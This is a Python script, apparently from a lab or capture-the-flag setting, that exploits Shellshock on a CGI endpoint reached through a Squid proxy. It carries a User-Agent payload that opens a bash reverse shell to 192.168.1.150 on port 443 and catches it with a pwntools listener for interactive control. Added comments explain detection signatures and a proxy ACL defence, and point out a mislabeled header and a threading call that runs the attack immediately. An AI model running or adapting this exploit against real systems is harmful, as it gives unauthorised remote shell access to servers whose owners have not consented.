#!/usr/bin/env python3
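"""
Shellshock check against a CGI endpoint, sent through a Squid proxy.

The original header described this file as a script to discover open ports
on a web server through a Squid proxy. The code below does not scan ports:
it sends a single HTTP request carrying a Shellshock payload in the
User-Agent header and then waits for a callback on a local listener.
"""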
import requests
import signal
import sys
import threading
from pwn import *
from termcolor import colored
def signal_handler(sig, frame):
    """Handle SIGINT: print a red exit notice and end the process with status 0.

    Args:
        sig: Signal number supplied by the interpreter (not used).
        frame: Stack frame supplied by the interpreter (not used).
    """
    farewell = colored('\n\n[!] Saliendo con Ctrl+C!\n', 'red')
    print(farewell)
    # Exit status 0: an operator-requested stop is not reported as a failure.
    sys.exit(0)
# Route SIGINT to signal_handler so Ctrl+C prints the exit notice and ends the
# process instead of surfacing as KeyboardInterrupt.
signal.signal(signal.SIGINT, signal_handler)
# Endpoint requested through the proxy. The proxy performs the fetch, so this
# loopback address is resolved on the proxy host, not on the machine running
# the script.
MAIN_URL = 'http://127.0.0.1/cgi-bin/status'

# Proxy mapping in the shape the ``proxies`` argument of requests expects.
squid_proxy = dict(http='http://192.168.1.150:3128')

# Local TCP port for the listener. The request header built in
# shellshock_attack hard-codes its own callback port and does not read this.
lport = 443
def shellshock_attack():
    """Send one GET to MAIN_URL via squid_proxy with a Shellshock User-Agent.

    The User-Agent value opens with a bash function definition
    (``() { :; };``) followed by a command that asks bash to connect back to
    192.168.1.150 on port 443. That address and port are fixed in the string;
    the module-level ``lport`` is not consulted here.

    For defenders: a header value beginning with ``() {`` is the signature to
    alert on in proxy and web-server logs, and a patched bash does not run
    the trailing command. Because the request targets a loopback URL through
    the proxy, a proxy policy that refuses loopback destinations (Squid's
    ``to_localhost`` ACL) stops the request before the CGI is reached.

    Returns:
        None. The response object is stored locally and never inspected.
    """
    request_options = {
        "headers": {
            "User-Agent": "() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.150/443 0>&1'"
        },
        "proxies": squid_proxy,
        # One-second timeout; any requests exception propagates to the caller.
        "timeout": 1,
    }
    response = requests.get(MAIN_URL, **request_options)
if __name__ == "__main__":
    # shellshock_attack() is evaluated on this line, in the main thread, and
    # Thread receives its return value as ``target``.
    try:
        threading.Thread(target=shellshock_attack(), args=()).start()
    except Exception as exc:
        # NOTE(review): pwntools documents log.error as raising after it
        # logs - confirm, since that would end the script at this point.
        log.error(str(exc))

    # Listen on lport with a 20 second timeout for an inbound connection.
    shell = listen(lport, timeout=20).wait_for_connection()

    # The script treats a missing socket as "no connection arrived".
    if shell.sock is not None:
        log.success(colored("\n[+] Conexión establecida\n", "green"))
        shell.interactive()
    else:
        log.failure(colored(
            "\n[!] No se ha podido establecer la conexión\n", "red"
        ))
        sys.exit(1)